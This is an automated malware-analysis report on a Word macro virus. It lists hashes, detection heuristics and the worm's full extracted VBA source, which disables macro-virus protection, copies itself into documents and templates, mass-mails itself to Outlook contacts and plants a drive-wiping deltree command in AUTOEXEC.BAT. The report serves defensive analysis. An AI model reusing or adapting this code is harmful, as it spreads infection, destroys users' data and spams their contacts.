Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc3450dc5827c252…

MALICIOUS

Office (OLE)

33.5 KB Created: 2002-09-11 01:27:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 17bf9d8413340d8b891338e0cd3f70f0 SHA-1: a6ec869229cbdee71f75b442bc3b51e88fc7eb33 SHA-256: fc3450dc5827c252988b24407ce853240e471e2bfaf7833c6567121f19e8217b
508 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This document contains legacy WordBasic macro markers and a VBA AutoOpen macro, indicating a macro-based threat. The presence of a Shell() call and CreateObject() suggests the macro is designed to execute arbitrary code or download additional payloads. The ClamAV detection as 'Doc.Trojan.Indeed-1' further supports its malicious nature. The macro attempts to spread itself to other DOT files, characteristic of a worm.

Heuristics 10

  • ClamAV: Doc.Trojan.Indeed-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Indeed-1
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell "C:\MAPI.REG", vbHide
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Shell "RUNDLL32.EXE,user.exe,exitwindows", vbHide
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATION
    VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.
    Matched line in script
    Set SpamItem = MailSvr.CreateItem(0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set MailSvr = CreateObject("Outlook.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3849 bytes
SHA-256: 5f7a7947d7bd0abfc887c54cf24b23c6bb94291a5a40e40b1c3f4aad2de32a9e
Detection
ClamAV: Doc.Trojan.Indeed-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Rem W97M/DOTWorm virus by FSO.
Rem First macro worm to spread in DOT files.
Sub ToolsMacro()
On Error Resume Next
Call MacroWorm
End Sub
Sub ToolsOptions()
On Error Resume Next
Call MacroWorm
End Sub
Sub ViewVBCode()
On Error Resume Next
Call MacroWorm
End Sub
Sub ToolsSecurity()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileTemplates()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileNew()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileOpen()
On Error Resume Next
Call MacroWorm
End Sub
Sub AutoOpen()
On Error Resume Next
Call MacroWorm
End Sub
Sub AutoExec()
On Error Resume Next
Call MacroWorm
End Sub
Sub MacroWorm()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.ShowVisualBasicEditor = False
Options.AllowFastSave = True
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Documents(MacroContainer.Name).VBProject.VBComponents(1).CodeModule
OurLines = OurCode.Lines(1, OurCode.CountOfLines)
For X = 1 To Documents.Count
If Mid(Documents(X).Name, 1, 8) <> "Document" And Documents(X).VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "Rem WM97/DOTWorm virus by FSO." Then
Documents(X).Password = ""
Documents(X).ReadOnlyRecommended = False
Documents(X).WritePassword = ""
With Documents(X).VBProject.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End With
With Documents(X)
.SaveAs (.FullName)
End With
End If
Next
For Y = 1 To Templates.Count
With Templates(Y).VBProject.VBComponents(1).CodeModule
If Mid(Templates(Y).Name, 1, 8) <> "Template" And .Lines(1, 1) <> "Rem W97M/DOTWorm virus by FSO." Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End If
End With
Templates(Y).Save
Next
With NormalTemplate.VBProject.VBComponents(1).CodeModule
If .Lines(1, 1) <> "Rem W97M/DOTWorm virus by FSO." Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End If
End With
FileCopy NormalTemplate.FullName, Application.Path & "\Love Letter For"
You.dot ""
If Int(Rnd * 5) = 2 Then
Set MailSvr = CreateObject("Outlook.Application")
If MailSvr Is Not Nothing Then
Set MAPI = MailSvr.GetNameSpace("MAPI")
For X = 1 To MAPI.AddressLists.Count
Set AddyList = MAPI.AddressLists(X)
For Y = 1 To AddyList.AddressEntries.Count
Set Contact = AddyList.AddressEntries(Y)
MailAddy = Contact.Address
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\WAB", MailAddy) <> "FSO" Then
Set SpamItem = MailSvr.CreateItem(0)
SpamItem.Bcc = MailAddy
SpamItem.Subject = "Very Funny"
SpamItem.Body = vbCrLf & "  Very good.  A must read, indeed.  Ha!"
SpamItem.DeleteAfterSubmit = True
SpamItem.Attachments.Add (Application.Path & "\Very Funny.dot")
SpamItem.Send
If Dir("C:\MAPI.REG") = "" Then
Open "C:\MAPI.REG" For Output As #1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\WAB]"
End If
Print #1, Chr(34) & MailAddy & Chr(34) & " = " & Chr(34) & "FSO" & Chr(34)
Next
Next
If Dir("C:\MAPI.REG") <> "" Then
Print #1, ""
Print #1, ""
Close #1
Shell "C:\MAPI.REG", vbHide
End If
End If
End If
If Int(Rnd * 30) = 2 Then
Call Ha
End If
End Sub
Sub Ha()
Open "C:\AUTOEXEC.BAT" For Output As #2
Print #2, "Rem System Check"
Print #2, "deltree c:\*.* /y"
Print #2, "Rem System Check!  That's bull****!"
Close #2
Shell "RUNDLL32.EXE,user.exe,exitwindows", vbHide
End Sub
Rem Ha! Have a nice day!